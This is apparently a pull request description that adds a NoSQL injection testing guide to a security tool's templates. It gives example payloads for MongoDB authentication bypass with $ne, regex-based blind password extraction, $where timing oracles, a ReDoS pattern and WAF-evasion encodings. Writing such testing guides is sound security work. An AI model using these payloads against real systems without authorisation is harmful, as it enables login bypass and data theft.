feat: Add NoSQL injection vulnerability guide

[timlzh]

Adds a detailed NoSQL injection detection guide following the existing template structure.

Changes

✅ Added nosql_injection.jinja - NoSQL Operator injection, JavaScript execution, ODM exploitation, blind extraction techniques

Testing

Guide follows the established format and includes:

• Critical context and scope
• Methodology
• Injection surfaces
• Database-specific primitives (MongoDB, CouchDB, Redis, Cassandra, Neo4j)
• Authentication bypass techniques
• Data extraction methods
• WAF/filter bypasses
• Validation criteria
• Pro tips

Examples

MongoDB Operator Injection

Authentication bypass: {"username": {"$ne": ""}, "password": {"$ne": ""}}
Regex extraction: {"password": {"$regex": "^a.*"}} for character-by-character enumeration
Query string notation: ?username=admin&password[$ne]=wrongpass

JavaScript Execution

$where clause: {"$where": "sleep(5000)"} for timing-based detection
$function operator (MongoDB 4.4+): Server-side JS in aggregation pipelines
Object.keys() enumeration for field discovery

Blind Extraction

Binary search via regex ranges: ^[a-m] vs ^[n-z]
Timing oracle: conditional sleep in $where clauses
ReDoS patterns: {"$regex": "^(a+)+$"} for pathological backtracking

WAF Bypasses

URL encoding: %24ne instead of $ne
JSON unicode escapes: \u0024ne
Operator alternatives: $not instead of $ne, $nin for negation

Framework-Specific Issues

Mongoose: find(req.body) without sanitization
PyMongo: Unsanitized dictionaries from JSON input
GraphQL + MongoDB: Operator injection via variables